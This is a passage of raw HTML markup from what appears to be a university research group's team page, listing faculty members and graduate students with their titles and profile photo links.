data-colibri-id=\"182-c36\">\n<div class=\"h-heading__outer style-516 style-local-182-c36\">\n<h4 class=\"\">Anu Bourgeois</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-517 style-local-182-c37 position-relative h-element\" data-colibri-id=\"182-c37\">\n<div class=\"\">\n\nAssociate Professor\n\n</div>\n</div>\n<div class=\"style-521 style-local-182-c38 position-relative h-element\" data-colibri-id=\"182-c38\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-512-outer style-local-182-c39-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-512 style-local-182-c39 position-relative\" data-colibri-id=\"182-c39\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-513 style-local-182-c40 position-relative h-element\" data-colibri-id=\"182-c40\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-711 style-513-image style-local-182-c40-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-skums.jpeg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-513-frameImage style-local-182-c40-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-514 style-local-182-c41 position-relative\" data-colibri-id=\"182-c41\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-515-outer style-local-182-c42-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-515 style-local-182-c42 position-relative\" data-colibri-id=\"182-c42\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-516 style-local-182-c43 position-relative h-element\" data-colibri-id=\"182-c43\">\n<div class=\"h-heading__outer style-516 style-local-182-c43\">\n<h4 class=\"\">Pavel Skums</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-517 style-local-182-c44 position-relative h-element\" data-colibri-id=\"182-c44\">\n<div class=\"\">\n\nAssistant Professor\n\n</div>\n</div>\n<div class=\"style-518 style-local-182-c45 position-relative h-element\" data-colibri-id=\"182-c45\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-512-outer style-local-182-c46-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-512 style-local-182-c46 position-relative\" data-colibri-id=\"182-c46\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-513 style-local-182-c47 position-relative h-element\" data-colibri-id=\"182-c47\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-712 style-513-image style-local-182-c47-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-zelikovsky-1.jpeg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-513-frameImage style-local-182-c47-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-514 style-local-182-c48 position-relative\" data-colibri-id=\"182-c48\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-515-outer style-local-182-c49-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-515 style-local-182-c49 position-relative\" data-colibri-id=\"182-c49\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-516 style-local-182-c50 position-relative h-element\" data-colibri-id=\"182-c50\">\n<div class=\"h-heading__outer style-516 style-local-182-c50\">\n<h4 class=\"\">Alex Zelikovsky</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-517 style-local-182-c51 position-relative h-element\" data-colibri-id=\"182-c51\">\n<div class=\"\">\n\nDistinguished University Professor\n\n</div>\n</div>\n<div class=\"style-518 style-local-182-c52 position-relative h-element\" data-colibri-id=\"182-c52\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-512-outer style-local-182-c53-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-512 style-local-182-c53 position-relative\" data-colibri-id=\"182-c53\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-513 style-local-182-c54 position-relative h-element\" data-colibri-id=\"182-c54\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-1348 style-513-image style-local-182-c54-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/08/hu_new-1.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-513-frameImage style-local-182-c54-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-514 style-local-182-c55 position-relative\" data-colibri-id=\"182-c55\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-515-outer style-local-182-c56-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-515 style-local-182-c56 position-relative\" data-colibri-id=\"182-c56\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-516 style-local-182-c57 position-relative h-element\" data-colibri-id=\"182-c57\">\n<div class=\"h-heading__outer style-516 style-local-182-c57\">\n<h4 class=\"\">Xiaolin Hu</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-517 style-local-182-c58 position-relative h-element\" data-colibri-id=\"182-c58\">\n<div class=\"\">\n\nProfessor\n\n</div>\n</div>\n<div class=\"style-518 style-local-182-c59 position-relative h-element\" data-colibri-id=\"182-c59\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-512-outer style-local-182-c60-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-512 style-local-182-c60 position-relative\" data-colibri-id=\"182-c60\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-513 style-local-182-c61 position-relative h-element\" data-colibri-id=\"182-c61\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-713 style-513-image style-local-182-c61-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Taylor-shelton_300x300.jpeg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-513-frameImage style-local-182-c61-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-514 style-local-182-c62 position-relative\" data-colibri-id=\"182-c62\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-515-outer style-local-182-c63-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-515 style-local-182-c63 position-relative\" data-colibri-id=\"182-c63\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-516 style-local-182-c64 position-relative h-element\" data-colibri-id=\"182-c64\">\n<div class=\"h-heading__outer style-516 style-local-182-c64\">\n<h4 class=\"\">Taylor Shelton</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-517 style-local-182-c65 position-relative h-element\" data-colibri-id=\"182-c65\">\n<div class=\"\">\n\n<span style=\"color: #4055a9; font-family: \'Open Sans\'; font-size: 16px; font-weight: 400;\">Assistant Professor</span>\n\n</div>\n</div>\n<div class=\"style-518 style-local-182-c66 position-relative h-element\" data-colibri-id=\"182-c66\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div id=\"team-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-605 style-local-182-c70 position-relative\" data-colibri-component=\"section\" data-colibri-id=\"182-c70\">\n<div class=\"h-section-grid-container h-section-boxed-container\">\n<div class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-617 style-local-182-c169 position-relative\" data-colibri-id=\"182-c169\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-618-outer style-local-182-c170-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-618 style-local-182-c170 position-relative\" data-colibri-id=\"182-c170\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-619 style-local-182-c171 position-relative h-element\" data-colibri-id=\"182-c171\">\n<div class=\"h-heading__outer style-619 style-local-182-c171\">\n<h2 class=\"\">Graduate Students</h2>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-606 style-local-182-c71 position-relative\" data-colibri-id=\"182-c71\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-607-outer style-local-182-c72-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-607 style-local-182-c72 position-relative\" data-colibri-id=\"182-c72\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-608 style-local-182-c73 position-relative h-element\" data-colibri-id=\"182-c73\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-784 style-608-image style-local-182-c73-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sundos_Al_Subhi-1.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-608-frameImage style-local-182-c73-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-609 style-local-182-c74 position-relative\" data-colibri-id=\"182-c74\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-610-outer style-local-182-c75-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-610 style-local-182-c75 position-relative\" data-colibri-id=\"182-c75\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-611 style-local-182-c76 position-relative h-element\" data-colibri-id=\"182-c76\">\n<div class=\"h-heading__outer style-611 style-local-182-c76\">\n<h4 class=\"\">Sundos Al Subhi</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-612 style-local-182-c77 position-relative h-element\" data-colibri-id=\"182-c77\">\n<div class=\"\">\n\nPhD student\n\n</div>\n</div>\n<div class=\"style-613 style-local-182-c78 position-relative h-element\" data-colibri-id=\"182-c78\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-607-outer style-local-182-c79-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-607 style-local-182-c79 position-relative\" data-colibri-id=\"182-c79\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-608 style-local-182-c80 position-relative h-element\" data-colibri-id=\"182-c80\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-775 style-608-image style-local-182-c80-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Reshmanjali.jpeg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-608-frameImage style-local-182-c80-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-609 style-local-182-c81 position-relative\" data-colibri-id=\"182-c81\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-610-outer style-local-182-c82-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-610 style-local-182-c82 position-relative\" data-colibri-id=\"182-c82\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-611 style-local-182-c83 position-relative h-element\" data-colibri-id=\"182-c83\">\n<div class=\"h-heading__outer style-611 style-local-182-c83\">\n<h4 class=\"\">Sai Reshmanjali</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-612 style-local-182-c84 position-relative h-element\" data-colibri-id=\"182-c84\">\n<div class=\"\">\n\nMaster\'s student\n\n</div>\n</div>\n<div class=\"style-614 style-local-182-c85 position-relative h-element\" data-colibri-id=\"182-c85\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-607-outer style-local-182-c86-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-607 style-local-182-c86 position-relative\" data-colibri-id=\"182-c86\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-608 style-local-182-c87 position-relative h-element\" data-colibri-id=\"182-c87\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-776 style-608-image style-local-182-c87-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bhavya-scaled-1.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-608-frameImage style-local-182-c87-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-609 style-local-182-c88 position-relative\" data-colibri-id=\"182-c88\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-610-outer style-local-182-c89-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-610 style-local-182-c89 position-relative\" data-colibri-id=\"182-c89\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-611 style-local-182-c90 position-relative h-element\" data-colibri-id=\"182-c90\">\n<div class=\"h-heading__outer style-611 style-local-182-c90\">\n<h4 class=\"\">Bhavya Busireddy</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-612 style-local-182-c91 position-relative h-element\" data-colibri-id=\"182-c91\">\n<div class=\"\">\n\nMaster\'s student\n\n</div>\n</div>\n<div class=\"style-615 style-local-182-c92 position-relative h-element\" data-colibri-id=\"182-c92\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-607-outer style-local-182-c93-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-607 style-local-182-c93 position-relative\" data-colibri-id=\"182-c93\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-608 style-local-182-c94 position-relative h-element\" data-colibri-id=\"182-c94\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-777 style-608-image style-local-182-c94-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sarah_Akinola-scaled-1.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-608-frameImage style-local-182-c94-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-609 style-local-182-c95 position-relative\" data-colibri-id=\"182-c95\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-610-outer style-local-182-c96-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-610 style-local-182-c96 position-relative\" data-colibri-id=\"182-c96\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-611 style-local-182-c97 position-relative h-element\" data-colibri-id=\"182-c97\">\n<div class=\"h-heading__outer style-611 style-local-182-c97\">\n<h4 class=\"\">Sarah Akinol</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-612 style-local-182-c98 position-relative h-element\" data-colibri-id=\"182-c98\">\n<div class=\"\">\n\nMaster\'s student\n\n</div>\n</div>\n<div class=\"style-616 style-local-182-c99 position-relative h-element\" data-colibri-id=\"182-c99\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-607-outer style-local-182-c100-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-607 style-local-182-c100 position-relative\" data-colibri-id=\"182-c100\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-608 style-local-182-c101 position-relative h-element\" data-colibri-id=\"182-c101\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-838 style-608-image style-local-182-c101-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Basit-2.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-608-frameImage style-local-182-c101-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-609 style-local-182-c102 position-relative\" data-colibri-id=\"182-c102\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-610-outer style-local-182-c103-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-610 style-local-182-c103 position-relative\" data-colibri-id=\"182-c103\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-611 style-local-182-c104 position-relative h-element\" data-colibri-id=\"182-c104\">\n<div class=\"h-heading__outer style-611 style-local-182-c104\">\n<h4 class=\"\">Basit Damilare Amuda</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-612 style-local-182-c105 position-relative h-element\" data-colibri-id=\"182-c105\">\n<div class=\"\">\n\n<span style=\"font-weight: 400; font-size: 16px; font-family: \'Open Sans\'; color: #4055a9;\">Master\'s student</span>\n\n</div>\n</div>\n<div class=\"style-613 style-local-182-c106 position-relative h-element\" data-colibri-id=\"182-c106\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-607-outer style-local-182-c107-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-607 style-local-182-c107 position-relative\" data-colibri-id=\"182-c107\">\n<div 